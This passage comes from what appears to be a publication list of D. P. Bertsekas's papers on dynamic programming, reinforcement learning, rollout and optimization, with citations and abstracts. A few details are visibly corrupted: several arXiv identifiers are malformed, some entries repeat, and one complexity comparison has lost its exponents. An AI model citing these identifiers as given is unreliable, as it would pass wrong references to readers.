Slides).\n\n• D. P. Bertsekas, \"Proximal Algorithms and Temporal Differences for Large Linear Systems: Extrapolation, Approximation, and Simulation,\" Lab. for Information and Decision Systems Report LIDS-P-3205, MIT, October 2016; arXiv preprint arXiv:1610.1610.05427; a version appears in Computational Optimization and Applications J, Vol. 70, 2018, pp. 709-736. (Related Video Lecture from INFORMS ICS Conference, Jan 2017). (Slides from INFORMS ICS Conference). (Related Slides from NIPS 2017).\n\n• D. P. Bertsekas, \"Affine Monotonic and Risk-Sensitive Models in Dynamic Programming,\" Lab. for Information and Decision Systems Report LIDS-3204, MIT, June 2016 (revised Nov. 2017); arXiv preprint arXiv:1608.01393; IEEE Transactions on Aut. Control, Vol. 64, 2019, pp. 3117-3128.\n\n• D. P. Bertsekas, \"Incremental Aggregated Proximal and Augmented Lagrangian Algorithms,\" Lab. for Information and Decision Systems Report LIDS-P-3176, MIT, July 2015; revised September 2015; arXiv preprint arXiv:1507.1365936. Incorporated into the author's book \"Nonlinear Programming,\" 3rd edition, Athena Scientific, 2016. (Related Lecture Slides). (Related Video Lecture) .\n\n• D. P. Bertsekas, \"Regular Policies in Abstract Dynamic Programming,\" Lab. for Information and Decision Systems Report LIDS-P-3173, MIT, May 2015; SIAM J. on Optimization, Vol. 27, 2017, pp. 1694-1727. (Related Lecture Slides); (Related Video Lectures).\n\n• D. P. Bertsekas, \"Value and Policy Iteration in Deterministic Optimal Control and Adaptive Dynamic Programming,\" Lab. for Information and Decision Systems Report LIDS-P-3174, MIT, May 2015 (revised Sept. 2015); arXiv preprint arXiv:1507.01026; IEEE Transactions on Neural Networks and Learning Systems, Vol. 28, 2017, pp. 500-509.\n\n• D. P. Bertsekas, \"Robust Shortest Path Planning and Semicontractive Dynamic Programming,\" Lab. for Information and Decision Systems Report LIDS-P-2915, MIT, Feb. 2014 (revised Jan. 2015 and June 2016); arXiv preprint arXiv:1608.01670; Naval Research Logistics (NRL), 2019, Vol. 66, pp.15-37.\n\n• D. P. Bertsekas and H. Yu, \"Stochastic Shortest Path Problems Under Weak Conditions,\" Lab. for Information and Decision Systems Report LIDS-P-2909, MIT, Jan. 2016 (generalized and incorporated into the book Abstract Dynamic Programming, 3rd edition, Athena Scientific, 2022).\n\n• H. Yu and D. P. Bertsekas, \"A Mixed Value and Policy Iteration Method for Stochastic Control with Universally Measurable Policies,\" Lab. for Information and Decision Systems Report LIDS-P-2905, MIT, July 2013; Journal Version,Mathematics of Operations Research, Vol. 40, 2015, pp. 926-968.\n\n• M. Wang and D. P. Bertsekas, \"Incremental Constraint Projection-Proximal Methods for Nonsmooth Convex Optimization ,\" Lab. for Information and Decision Systems Report LIDS-P-2907, MIT, July 2013. (Related Lecture Slides) (Related Video Lecture) .\n\n• M. Wang and D. P. Bertsekas, \"Stochastic First-Order Methods with Random Constraint Projection,\" SIAM Journal on Optimization, Vol. 26, 2016, pp. 681-717. (Related Lecture Slides) (Related Video Lecture) .\n\n• M. Wang and D. P. Bertsekas, \"Incremental Constraint Projection Methods for Variational Inequalities,\" Lab. for Information and Decision Systems Report LIDS-P-2898, MIT, December 2012; Mathematical Programming, Vol. 150, 2015, pp. 321-363.\n\n• H. Yu and D. P. Bertsekas, \"Weighted Bellman Equations and their Applications in Dynamic Programming,\" Lab. for Information and Decision Systems Report LIDS-P-2876, MIT, October 2012. (Related Lecture Slides from INFORMS 2012.) (Related Lecture Slides from ADPRL 2014.) (Video of the lecture from ADPRL 2014.) (Generalized and incorporated into the book Abstract Dynamic Programming, 3rd edition, Athena Scientific, 2022).\n\n• D. P. Bertsekas, \"Weighted Sup-Norm Contractions in Dynamic Programming: A Review and Some New Applications,\" Lab. for Information and Decision Systems Report LIDS-P-2884, MIT, May 2012.\n\n• M. Wang and D. P. Bertsekas, \"Stabilization of Stochastic Iterative Methods for Singular and Nearly Singular Linear Systems,\" Lab. for Information and Decision Systems Report LIDS-P-2878, MIT, December 2011 (revised March 2012); Mathematics of Operations Research, Vol. 39, pp. 1-30, 2013 related slide presentation, related poster presentation.\n\n• M. Wang and D. P. Bertsekas, \"Convergence of Iterative Simulation-Based Methods for Singular Linear Systems,\" Lab. for Information and Decision Systems Report LIDS-P-2879, MIT, December 2011 (revised April 2012); Stochastic Systems, Vol. 3, pp 39-96, 2013. related slide presentation, related poster presentation.\n\n• D. P. Bertsekas, \"Lambda-Policy Iteration: A Review and a New Implementation,\" Lab. for Information and Decision Systems Report LIDS-P-2874, MIT, October 2011. In \"Reinforcement Learning and Approximate Dynamic Programming for Feedback Control,\" by F. Lewis and D. Liu (eds.), IEEE Press Computational Intelligence Series.(Video of a related lecture from ADPRL 2014.)(Lecture Slides from ADPRL 2014.)\n\n• H. Yu and D. P. Bertsekas, \"Q-Learning and Policy Iteration Algorithms for Stochastic Shortest Path Problems,\" Lab. for Information and Decision Systems Report LIDS-P-2871, MIT, September 2011; revised March 2012; Annals of Operations Research Vol. 208, 2013, pp. 95-132.\n\n• H. Yu and D. P. Bertsekas, \"On Boundedness of Q-Learning Iterates for Stochastic Shortest Path Problems,\" Lab. for Information and Decision Systems Report LIDS-P-2859, MIT, March 2011; revised Sept. 2011; Mathematics of Operations Research 38(2), pp. 209-227, 2013.\n\n• D. P. Bertsekas, \"Temporal Difference Methods for General Projected Equations,\" IEEE Trans. on Automatic Control, Vol. 56, pp. 2128 - 2139, 2011. (Related Lecture Slides).\n\n• D. P. Bertsekas, \"Centralized and Distributed Newton Methods for Network Optimization and Extensions,\" Lab. for Information and Decision Systems Report LIDS-P-2866, MIT, April 2011.\n\n• D. P. Bertsekas and H. Yu, \"Distributed Asynchronous Policy Iteration in Dynamic Programming,\" Proc. of 2010 Allerton Conference on Communication, Control, and Computing, Allerton Park, ILL, Sept. 2010. (Related Lecture Slides) (An extended version with additional algorithmic analysis) (A counterexample by Williams and Baird that motivates in part this paper).\n\n• D. P. Bertsekas, \"Incremental Proximal Methods for Large Scale Convex Optimization,\" Mathematical Programming, Vol. 129, 2011, pp.163-195. An extended survey version: \"Incremental Gradient, Subgradient, and Proximal Methods for Convex Optimization: A Survey,\" Lab. for Information and Decision Systems Report LIDS-P-2848, MIT, August 2010. (Related Lecture Slides). (Related Video Lecture).\n\n• D. P. Bertsekas, \"Pathologies of Temporal Difference Methods in Approximate Dynamic Programming,\" Proc. 2010 IEEE Conference on Decision and Control, Atlanta, GA, Dec. 2010. (Related Lecture Slides).\n\n• D. P. Bertsekas and H. Yu, \"Q-Learning and Enhanced Policy Iteration in Discounted Dynamic Programming,\" Lab. for Information and Decision Systems Report LIDS-P-2831, MIT, April, 2010 (revised November 2011); Math. of Operations Research, Vol. 37, 2012, pp. 66-94; a shorter version appears in Proc. of 2010 IEEE Conf. on Decision and Control, Atlanta, GA, Dec. 2010. (Related Lecture Slides) (A counterexample by Williams and Baird that motivates in part this paper)\n\n• D. P. Bertsekas, \"Approximate Policy Iteration: A Survey and Some New Methods,\" Journal of Control Theory and Applications, Vol. 9, 2011, pp. 310-335.\n\n• D. P. Bertsekas and H. Yu, \"A Unifying Polyhedral Approximation Framework for Convex Optimization,\" Lab. for Information and Decision Systems Report LIDS-P-2820, MIT, September 2009 (revised December 2010), published in SIAM J. on Optimization, Vol. 21, 2011, pp. 333-360. (Related VideoLecture, Dec. 2008) (Related Lecture Slides).\n\n• H. Yu and D. P. Bertsekas, \"Error Bounds for Approximations from Projected Linear Equations,\" Mathematics of Operations Research, Vol. 35, 2010, pp. 306-329. -- A shorter/abridged version appeared at European Workshop on Reinforcement Learning (EWRL'08), 2008, Lille, France. (Related Lecture Slides).\n\n• A. Nedich and D. P. Bertsekas, \"The Effect of Deterministic Noise in Subgradient Methods,\" Math. Programming, Ser. A, Vol. 125, pp. 75-99, 2010.\n\n• D. P. Bertsekas and H. Yu, \"Projected Equation Methods for Approximate Solution of Large Linear Systems,\" Journal of Computational and Applied Mathematics, Vol. 227, 2009, pp. 27-50.\n\n• Bertsekas, D., \"Rollout Algorithms and Approximate Dynamic Programming for Bayesian Optimization and Sequential Estimation,\" Dec. 2022, arXiv:2212.07998. We provide a unifying approximate dynamic programming framework that applies to a broad variety of problems involving sequential estimation. We consider first the construction of surrogate cost functions for the purposes of optimization, and we focus on the special case of Bayesian optimization, using the rollout algorithm and some of its variations. We then discuss the more general case of sequential estimation of a random vector using optimal measurement selection, and its application to problems of stochastic and adaptive control. We finally consider related search and sequential decoding problems, and a rollout algorithm for the approximate solution of the Wordle and Mastermind puzzles, recently developed in the paper [BBB22].\n\n• Bhambri, S., Bhattacharjee, A., Bertsekas, D., \"Reinforcement Learning Methods for Wordle: A POMDP/Adaptive Control Approach,\" Arizona State University/SCAI Report, Nov. 2022; arXiv:2211.10298. In this paper we address the solution of the popular Wordle puzzle, using new reinforcement learning methods, which apply more generally to adaptive control of dynamic systems and to classes of Partially Observable Markov Decision Process (POMDP) problems. These methods are based on approximation in value space and the rollout approach, admit a straightforward implementation, and provide improved performance over various heuristic approaches. For the Wordle puzzle, they yield on-line solution strategies that are very close to optimal at relatively modest computational cost. Our methods are viable for more complex versions of Wordle and related search problems, for which an optimal strategy would be impossible to compute. They are also applicable to a wide range of adaptive sequential decision problems that involve an unknown or frequently changing environment whose parameters are estimated on-line.\n\n• Garces, D., Bhattacharya, S., Gil, G., and Bertsekas, D., \"Multiagent Reinforcement Learning for Autonomous Routing and Pickup Problem with Adaptation to Variable Demand\", Nov. 2022; arXiv:2211.14983. We derive a learning framework to generate routing/pickup policies for a fleet of vehicles tasked with servicing stochastically appearing requests on a city map. We focus on policies that 1) give rise to coordination amongst the vehicles, thereby reducing wait times for servicing requests, 2) are non-myopic, considering a-priori unknown potential future requests, and 3) can adapt to changes in the underlying demand distribution. Specifically, we are interested in adapting to fluctuations of actual demand conditions in urban environments, such as on-peak vs. off-peak hours. We achieve this through a combination of (i) online play, a lookahead optimization method that improves the performance of rollout methods via an approximate policy iteration step, and (ii) an offline approximation scheme that allows for adapting to changes in the underlying demand model. In particular, we achieve adaptivity of our learned policy to different demand distributions by quantifying a region of validity using the q-valid radius of a Wasserstein Ambiguity Set. We propose a mechanism for switching the originally trained offline approximation when the current demand is outside the original validity region. In this case, we propose to use an offline architecture, trained on a historical demand model that is closer to the current demand in terms of Wasserstein distance. We learn routing and pickup policies over real taxicab requests in downtown San Francisco with high variability between on-peak and off-peak hours, demonstrating the ability of our method to adapt to real fluctuation in demand distributions. Our numerical results demonstrate that our method outperforms rollout-based reinforcement learning, as well as several benchmarks based on classical methods from the field of operations research.\n\n• D. P. Bertsekas, \"Auction Algorithms for Path Planning, Network Transport, and Reinforcement Learning,\" Arizona State University/SCAI Report, July 2022; this is an updated version of a paper posted at arXiv:22207.09588. We consider some classical optimization problems in path planning and network transport, and we introduce new auction-based algorithms for their optimal and suboptimal solution. The algorithms are based on mathematical ideas that are related to competitive bidding for attaining market equilibrium, which underlie auction processes. However, their starting point is different, namely weighted and unweighted path construction in directed graphs, rather than assignment of persons to objects. The new algorithms have several potential advantages over existing methods: they are empirically faster in some important contexts, such as max-flow, they are well-suited for on-line replanning, and they can be adapted to distributed operation. Moreover, they can take advantage of reinforcement learning methods that use off-line training with data, as well as on-line training during real-time operation.\n\n• D. P. Bertsekas, \"Distributed Asynchronous Policy Iteration for Sequential Zero-Sum Games and Minimax Control,\" arXiv preprint arXiv:2107.10406, July 2021; revised October 2021 (incorporated as Chapter 5 into the book Abstract Dynamic Programming, 3rd edition, Athena Scientific, 2022). We introduce a contractive abstract dynamic programming framework and related policy iteration algorithms, specifically designed for sequential zero-sum games and minimax problems with a general structure. Aside from greater generality, the advantage of our algorithms over alternatives is that they resolve some long-standing convergence difficulties of the natural\" policy iteration algorithm, which have been known since the Pollatschek and Avi-Itzhak method [PoA69] for finite-state Markov games. Mathematically, this natural\" algorithm is a form of Newton's method for solving Bellman's equation, but Newton's method, contrary to the case of single-player DP problems, is not globally convergent in the case of a minimax problem, because the Bellman operator may have components that are neither convex nor concave. Our algorithms address this difficulty by introducing alternating player choices, and by using a policy-dependent mapping with a uniform sup-norm contraction property, similar to earlier works by Bertsekas and Yu [BeY10], [BeY12], [YuB13]. Moreover, our algorithms allow a convergent and highly parallelizable implementation, which is based on state space partitioning, and distributed asynchronous policy evaluation and policy improvement operations within each set of the partition. Our framework is also suitable for the use of reinforcement learning methods based on aggregation, which may be useful for large-scale problem instances.\n\n• D. P. Bertsekas, \"On-Line Policy Iteration for Infinite Horizon Dynamic Programming,\" arXiv preprint arXiv:2106.00746, May 2021 (incorporated into the books Rollout, Policy Iteration, and Distributed Reinforcement Learning, and Lessons from AlphaZero for Optimal, Model Predictive, and Adaptive Control, Athena Scientific, 2022). In this paper we propose an on-line policy iteration (PI) algorithm for finite-state infinite horizon discounted dynamic programming, whereby the policy improvement operation is done on-line, only for the states that are encountered during operation of the system. This allows the continuous updating/improvement of the current policy, thus resulting in a form of on-line PI that incorporates the improved controls into the current policy as new states and controls are generated. The algorithm converges in a finite number of stages to a type of locally optimal policy, and suggests the possibility of variants of PI and multiagent PI where the policy improvement is simplified. Moreover, the algorithm can be used with on-line replanning, and is also well-suited for on-line PI algorithms with value and policy approximations.\n\n• D. P. Bertsekas, \"Multiagent Reinforcement Learning: Rollout and Policy Iteration,\" ASU Report Oct. 2020; IEEE/CAA Journal of Automatica Sinica, Vol. 8, 2021, pp. 249-271; Video of an overview lecture. We discuss the solution of complex multistage decision problems using methods that are based on the idea of policy iteration (PI for short), i.e., start from some base policy and generate an improved policy. Rollout is the simplest method of this type, where just one improved policy is generated. We can view PI as repeated application of rollout, where the rollout policy at each iteration serves as the base policy for the next iteration. In contrast with PI, rollout has a robustness property: it can be applied on-line and is suitable for on-line replanning. Moreover, rollout can use as base policy one of the policies produced by PI, thereby improving on that policy. This is the type of scheme underlying the prominently successful AlphaZero chess program. In this paper we focus on rollout and PI-like methods for problems where the control consists of multiple components each selected (conceptually) by a separate agent. This is the class of multiagent problems where the agents have a shared objective function, and a shared and perfect state information. Based on a problem reformulation that trades off control space complexity with state space complexity, we develop an approach, whereby at every stage, the agents sequentially (one-at-a-time) execute a local rollout algorithm that uses a base policy, together with some coordinating information from the other agents. The amount of total computation required at every stage grows linearly with the number of agents. By contrast, in the standard rollout algorithm, the amount of total computation grows exponentially with the number of agents. Despite the dramatic reduction in required computation, we show that our multiagent rollout algorithm has the fundamental cost improvement property of standard rollout: it guarantees an improved performance relative to the base policy. We also discuss autonomous multiagent rollout schemes that allow the agents to make decisions autonomously through the use of precomputed signaling information, which is sufficient to maintain the cost improvement property, without any on-line coordination of control selection between the agents. For discounted and other infinite horizon problems, we also consider exact and approximate PI algorithms involving a new type of one-agent-at-a-time policy improvement operation. For one of our PI algorithms, we prove convergence to an agent-by-agent optimal policy, thus establishing a connection with the theory of teams. For another PI algorithm, which is executed over a more complex state space, we prove convergence to an optimal policy. Approximate forms of these algorithms are also given, based on the use of policy and value neural networks. These PI algorithms, in both their exact and their approximate form are strictly off-line methods, but they can be used to provide a base policy for use in an on-line multiagent rollout scheme.\n\n• D. P. Bertsekas, \"Multiagent Value Iteration Algorithms in Dynamic Programming and Reinforcement Learning,\" ASU Report, April 2020; arXiv preprint, arXiv:2005.01627, May 2020; Results in Control and Optimization J., Vol. 1, 2020. We consider infinite horizon dynamic programming problems, where the control at each stage consists of several distinct decisions, each one made by one of several agents. In an earlier work we introduced a policy iteration algorithm, where the policy improvement is done one-agent-at-a-time in a given order, with knowledge of the choices of the preceding agents in the order. As a result, the amount of computation for each policy improvement grows linearly with the number of agents, as opposed to exponentially for the standard all-agents-at-once method. For the case of a finite-state discounted problem, we showed convergence to an agent-by-agent optimal policy. In this paper, this result is extended to value iteration and optimistic versions of policy iteration, as well as to more general DP problems where the Bellman operator is a contraction mapping, such as stochastic shortest path problems with all policies being proper.\n\n• Li, Y., Johansson, K. H, Martensson, J., and D. P. Bertsekas, \"Data-Driven Rollout for Deterministic Optimal Control ,\" Proc.\\ of 2021 CDC; also arXiv preprint arXiv:2105.03116, Sept. 2021. We consider deterministic infinite horizon optimal control problems with nonnegative stage costs. We draw inspiration from learning model predictive control scheme designed for continuous dynamics and iterative tasks, and propose a rollout algorithm that relies on sampled data generated by some base policy. The proposed algorithm is based on value and policy iteration ideas, and applies to deterministic problems with arbitrary state and control spaces, and arbitrary dynamics. It admits extensions to problems with trajectory constraints, and a multiagent structure.\n\n• Liu, M., Pedrielli, G., Sulc, P., Poppleton, E., and D. P. Bertsekas, \"ExpertRNA: A New Framework for RNA Structure Prediction,\" bioRxiv 2021.01.18.427087, January 2021; INFORMS J. on Computing, to appear. Ribonucleic acid (RNA) is a fundamental biological molecule that is essential to all living organisms, performing a versatile array of cellular tasks. The function of many RNA molecules is strongly related to the structure it adopts. As a result, great effort is being dedicated to the design of efficient algorithms that solve the ?folding problem?: given a sequence of nucleotides, return a probable list of base pairs, referred to as the secondary structure prediction. Early algorithms have largely relied on finding the structure with minimum free energy. However, the predictions rely on effective simplified free energy models that may not correctly identify the correct structure as the one with the lowest free energy. In light of this, new, data-driven approaches that not only consider free energy, but also use machine learning techniques to learn motifs have also been investigated, and have recently been shown to outperform free energy based algorithms on several experimental data sets. In this work, we introduce the new ExpertRNA algorithm that provides a modular framework which can easily incorporate an arbitrary number of rewards (free energy or non-parametric/data driven) and secondary structure prediction algorithms. We argue that this capability of ExpertRNA has the potential to balance out different strengths and weaknesses of state-of-the-art folding tools. We test the ExpertRNA on several RNA sequence-structure data sets, and we compare the performance of ExpertRNA against a state-of-the-art folding algorithm. We find that ExpertRNA produces, on average, more accurate predictions than the structure prediction algorithm used, thus validating the promise of the approach.\n\n• D. P. Bertsekas, \"Constrained Multiagent Rollout and Multidimensional Assignment with the Auction Algorithm,\" arXiv preprint, arXiv:2002.07407, April 2020. We consider an extension of the rollout algorithm that applies to constrained deterministic dynamic programming, including challenging combinatorial optimization problems. The algorithm relies on a suboptimal policy, called base heuristic. Under suitable assumptions, we show that if the base heuristic produces a feasible solution, the rollout algorithm has a cost improvement property: it produces a feasible solution, whose cost is no worse than the base heuristic's cost. We then focus on multiagent problems, where the control at each stage consists of multiple components (one per agent), which are coupled either through the cost function or the constraints or both. We show that the cost improvement property is maintained with an alternative implementation that has greatly reduced computational requirements, and makes possible the use of rollout in problems with many agents. We demonstrate this alternative algorithm by applying it to layered graph problems that involve both a spatial and a temporal structure. We consider in some detail a prominent example of such problems: multidimensional assignment, where we use the auction algorithm for 2-dimensional assignment as a base heuristic. This auction algorithm is particularly well-suited for our context, because through the use of prices, it can advantageously use the solution of an assignment problem as a starting point for solving other related assignment problems, and this can greatly speed up the execution of the rollout algorithm.\n\n• Bhattacharya, S., Kailas, S., Badyal, S., Gil, S., Bertsekas, D.,\"Multiagent Rollout and Policy Iteration for POMDP with Application to   Multi-Robot Repair Problems,\" Proc. CORL, 2020; arXiv preprint, arXiv:2011.04222, November 2020. In this paper we consider infinite horizon discounted dynamic programming problems with finite state and control spaces, partial state observations, and a multiagent structure. We discuss and compare algorithms that simultaneously or sequentially optimize the agents' controls by using multistep lookahead, truncated rollout with a known base policy, and a terminal cost function approximation. Our methods specifically address the computational challenges of partially observable multiagent problems. In particular: 1) We consider rollout algorithms that dramatically reduce required computation while preserving the key cost improvement property of the standard rollout method. The per-step computational requirements for our methods are on the order of O(Cm) as compared with O(Cm) for standard rollout, where C is the maximum cardinality of the constraint set for the control component of each agent, and m is the number of agents. 2) We show that our methods can be applied to challenging problems with a graph structure, including a class of robot repair problems whereby multiple robots collaboratively inspect and repair a system under partial information. 3) We provide a simulation study that compares our methods with existing methods, and demonstrate that our methods can handle larger and more complex partially observable multiagent problems (state space size 10^37 and control space size 10^7, respectively). In particular, we verify experimentally that our multiagent rollout methods perform nearly as well as standard rollout for problems with few agents, and produce satisfactory policies for problems with a larger number of agents that are intractable by standard rollout and other state of the art methods. Finally, we incorporate our multiagent rollout algorithms as building blocks in an approximate policy iteration scheme, where successive rollout policies are approximated by using neural network classifiers. While this scheme requires a strictly off-line implementation, it works well in our computational experiments and produces additional significant performance improvement over the single online rollout iteration method.\n\n• S. Bhattacharya, S. Badyal, T. Wheeler, S. Gil, D. P. Bertsekas, \"Reinforcement Learning for POMDP: Partitioned Rollout and Policy Iteration with Application to Autonomous Sequential Repair Problems,\" IEEE Robotics and Automation Letters, Vol. 5, pp. 3967-3974, 2020; arXiv preprint arXiv:2002.04175. In this paper we consider infinite horizon discounted dynamic programming problems with finite state and control spaces, and partial state observations. We discuss an algorithm that uses multistep lookahead, truncated rollout with a known base policy, and a terminal cost function approximation. This algorithm is also used for policy improvement in an approximate policy iteration scheme, where successive policies are approximated by using a neural network classifier. A novel feature of our approach is that it is well suited for distributed computation through an extended belief space formulation and the use of a partitioned architecture, which is trained with multiple neural networks. We apply our methods in simulation to a class of sequential repair problems where a robot inspects and repairs a pipeline with potentially several rupture sites under partial information about the state of the pipeline.\n\n• D. P. Bertsekas, \"Multiagent Rollout Algorithms and Reinforcement Learning,\" arXiv preprint arXiv:1910.00120, April 2020. We consider finite and infinite horizon dynamic programming problems, where the control at each stage consists of several distinct decisions, each one made by one of several agents. We introduce an algorithm, whereby at every stage, each agent's decision is made by executing a local rollout algorithm that uses a base policy, together with some coordinating information from the other agents. The amount of local computation required at every stage by each agent is independent of the number of agents, while the amount of global computation (over all agents) grows linearly with the number of agents. By contrast, with the standard rollout algorithm, the amount of global computation grows exponentially with the number of agents. Despite the drastic reduction in required computation, we show that our algorithm has the fundamental cost improvement property of rollout: an improved performance relative to the base policy. We also explore related reinforcement learning and approximate policy iteration algorithms, and we discuss how this cost improvement property is affected when we attempt to improve further the method's computational efficiency through parallelization of the agents' computations.\n\n• D. P. Bertsekas, \"Biased Aggregation, Rollout, and Enhanced Policy Improvement for Reinforcement Learning,\" Lab. for Information and Decision Systems Report, MIT, October 2018; a shorter version appears as arXiv preprint arXiv:1910.02426, Oct. 2019. We propose a new aggregation framework for approximate dynamic programming, which provides a connection with rollout algorithms, approximate policy iteration, and other single and multistep lookahead methods. The central novel characteristic is the use of a scoring function $V$ of the state, which biases the values of the aggregate cost function towards their correct levels. The classical aggregation framework is obtained when $V\\equiv0$, but our scheme works best when $V$ is a known reasonably good approximation to the optimal cost function $\\jstar$. When $V$ is equal to the cost function $J_\\m$ of some known policy $\\m$, our scheme is equivalent to the rollout algorithm based on $\\m$, in the extreme case where there is a single aggregate state. In the case of hard aggregation with multiple aggregate states, our scheme is equivalent to approximation in value space with lookahead function $\\tl J$ equal to $J_\\m$ plus local corrections that are constant within each aggregate state. The local correction levels are obtained by solving a low-dimensional aggregate DP problem, yielding an arbitrarily close approximation $\\tl J$ to $\\jstar$, when the number of aggregate states is sufficiently large. As a result, for $V=J_\\m$, our score-based aggregation approach can be used as an enhanced form of improvement of the policy $\\m$. When combined with an approximate policy evaluation scheme, it can form the basis for a new and enhanced form of approximate policy iteration. When $V$ is a generic scoring function, the aggregation scheme is equivalent to approximation in value space based on $V$, in the extreme case of a single aggregate state. It can yield an arbitrarily close approximation to $\\jstar$ when a sufficiently large number of aggregate states are used, through local corrections to $V$, obtained by solving an aggregate problem. Except for the scoring function, the aggregate problem is similar to the one of the classical aggregation framework, and its algorithmic solution by simulation or other methods is nearly identical to one for classical aggregation, assuming values of $V$ are available when needed.\n\n• D. P. Bertsekas, \"Feature-Based Aggregation and Deep Reinforcement Learning: A Survey and Some New Implementations,\" Lab. for Information and Decision Systems Report, MIT, April 2018 (revised August 2018); arXiv preprint arXiv:1804.04577; a version published in IEEE/CAA Journal of Automatica Sinica. (Lecture Slides). (Related Video Lecture). In this paper we discuss policy iteration methods for approximate solution of a finite-state discounted Markov decision problem, with a focus on feature-based aggregation methods and their connection with deep reinforcement learning schemes. We introduce features of the states of the original problem, and we formulate a smaller aggregate\" Markov decision problem, whose states relate to the features. The optimal cost function of the aggregate problem, a nonlinear function of the features, serves as an architecture for approximation in value space of the optimal cost function or the cost functions of policies of the original problem. We discuss properties and possible implementations of this type of aggregation, including a new approach to approximate policy iteration. In this approach the policy improvement operation combines feature-based aggregation with reinforcement learning based on deep neural networks, which is used to obtain the needed features. We argue that the cost function of a policy may be approximated much more accurately by the nonlinear function of the features provided by aggregation, than by the linear function of the features provided by deep reinforcement learning, thereby potentially leading to more effective policy improvement.\n\n• D. P. Bertsekas, \"Proximal Algorithms and Temporal Differences for Large Linear Systems: Extrapolation, Approximation, and Simulation,\" Lab. for Information and Decision Systems Report LIDS-P-3205, MIT, October 2016; arXiv preprint arXiv:1610.1610.05427; a version appears in Computational Optimization and Applications J, Vol. 70, 2018, pp. 709-736. (Related Video Lecture from INFORMS ICS Conference, Jan 2017). (Slides from INFORMS ICS Conference). (Related Slides from NIPS 2017). We consider large linear and nonlinear fixed point problems, and solution with proximal algorithms. We show that there is a close connection between two seemingly different types of methods from distinct fields: 1) Proximal iterations for linear systems of equations, which are prominent in numerical analysis and convex optimization, and 2) Temporal difference (TD) type methods, such as TD(lambda), LSTD(lambda), and LSPE(lambda), which are central in simulation-based approximate dynamic programming/reinforcement learning (DP/RL), and its recent prominent successes in large-scale game contexts, among others. One benefit of this connection is a new and simple way to accelerate the standard proximal algorithm by extrapolation towards the TD iteration, which generically has a faster convergence rate. Another benefit is the potential integration into the proximal algorithmic context of several new ideas that have emerged in the DP/RL context. We discuss some of the possibilities, and in particular, algorithms that project each proximal iterate onto the subspace spanned by a small number of basis functions, using low-dimensional calculations and simulation. A third benefit is that insights and analysis from proximal algorithms can be brought to bear on the enhancement of TD methods. The linear fixed point methodology can be extended to nonlinear fixed point problems involving a contraction, thus providing guaranteed and potentially substantial acceleration of the proximal and forward backward splitting algorithms at no extra cost. Moreover, the connection of proximal and TD methods can be extended to nonlinear (nondifferentiable) fixed point problems through new proximal-like algorithms that involve successive linearization, similar to policy iteration in DP.\n\n• D. P. Bertsekas, \"Stable Optimal Control and Semicontractive Dynamic Programming,\" SIAM J. on Control and Optimization, Vol. 56, 2018, pp. 231-252, (Related Lecture Slides). We consider discrete-time infinite horizon deterministic optimal control problems with nonnegative cost, and a destination that is cost-free and absorbing. The classical linear-quadratic regulator problem is a special case. Our assumptions are very general, and allow the possibility that the optimal policy may not be stabilizing the system, e.g., may not reach the destination either asymptotically or in a finite number of steps. We introduce a new unifying notion of stable feedback policy, based on perturbation of the cost per stage, which in addition to implying convergence of the generated states to the destination, quantifies the speed of convergence. We consider the properties of two distinct cost functions: $J^*$, the overall optimal, and $\\hat J$, the restricted optimal over just the stable policies. Different classes of stable policies (with different speeds of convergence) may yield different values of $\\hat J$. We show that for any class of stable policies, $\\hat J$ is a solution of Bellman's equation, and we characterize the smallest and the largest solutions: they are $J^*$, and $J^+$, the restricted optimal cost function over the class of (finitely) terminating policies. We also characterize the regions of convergence of various modified versions of value and policy iteration algorithms, as substitutes for the standard algorithms, which may not work in general.\n\n• D. P. Bertsekas, \"Proper Policies in Infinite-State Stochastic Shortest Path Problems,\" arXiv preprint arXiv:1711.10129; appeared as Section 4.6 of the 3rd edition of the author's book \"Abstract Dynamic Programming\", Athena Scientific, 2022. (Related Lecture Slides). We consider stochastic shortest path problems with infinite state and control spaces, and a nonnegative cost per stage. We extend the notion of a proper policy from the context of finite state space to the context of infinite state space. We consider the optimal cost function $J^*$, and the optimal cost function $\\hat J$ over just the proper policies. Assuming that there exists at least one proper policy, we show that $J^*$ and $\\hat J$ are the smallest and largest solutions of Bellman's equation, respectively, within a class of functions with a boundedness property. The standard value iteration algorithm may be attracted to either $J^*$ or $\\hat J$, depending on the initial condition.\n\n• D. P. Bertsekas, \"Proximal Algorithms and Temporal Differences for Large Linear Systems: Extrapolation, Approximation, and Simulation,\" Lab. for Information and Decision Systems Report LIDS-P-3205, MIT, October 2016; arXiv preprint arXiv:1610.1610.05427; a version appears in Computational Optimization and Applications J, Vol. 70, 2018, pp. 709-736. (Related Video Lecture from INFORMS ICS Conference, Jan 2017). (Slides from INFORMS ICS Conference). (Related Slides from NIPS 2017). In this paper we consider large linear fixed point problems and solution with proximal algorithms. We show that, under certain assumptions, there is a close connection between proximal iterations, which are prominent in numerical analysis and optimization, and multistep methods of the temporal difference type such as TD(lambda), LSTD(lambda), and LSPE(lambda), which are central in simulation-based approximate dynamic programming. As an application of this connection, we show that we may accelerate the standard proximal algorithm by extrapolation towards the multistep iteration, which generically has a faster convergence rate. We also use the connection with multistep methods to integrate into the proximal algorithmic context several new ideas that have emerged in the approximate dynamic programming context. In particular, we consider algorithms that project each proximal iterate onto the subspace spanned by a small number of basis functions, using low-dimensional calculations and simulation, and we discuss various algorithmic options from approximate dynamic programming.\n\n• D. P. Bertsekas, \"Affine Monotonic and Risk-Sensitive Models in Dynamic Programming,\" Lab. for Information and Decision Systems Report LIDS-3204, MIT, June 2016; arXiv preprint arXiv:1608.01393; IEEE Transactions on Aut. Control, Vol. 64, 2019, pp. 3117-3128. In this paper we consider a broad class of infinite horizon discrete-time optimal control models that involve a nonnegative cost function and an affine mapping in their dynamic programming equation. They include as special cases classical models such as stochastic undiscounted nonnegative cost problems, stochastic multiplicative cost problems, and risk-sensitive problems with exponential cost. We focus on the case where the state space is finite and the control space has some compactness properties. We assume that the affine mapping has a semicontractive character, whereby for some policies it is a contraction, while for others it is not. In one line of analysis, we impose assumptions that guarantee that the latter policies cannot be optimal. Under these assumptions, we prove strong results that resemble those for discounted Markovian decision problems, such as the uniqueness of solution of Bellman's equation, and the validity of forms of value and policy iteration. In the absence of these assumptions, the results are weaker and unusual in character: the optimal cost function need not be a solution of Bellman's equation, and an optimal policy may not be found by value or policy iteration. Instead the optimal cost function over just the contractive policies solves Bellman's equation, and can be computed by a variety of algorithms.\n\n• D. P. Bertsekas, \"Regular Policies in Abstract Dynamic Programming,\" Lab. for Information and Decision Systems Report LIDS-P-3173, MIT, May 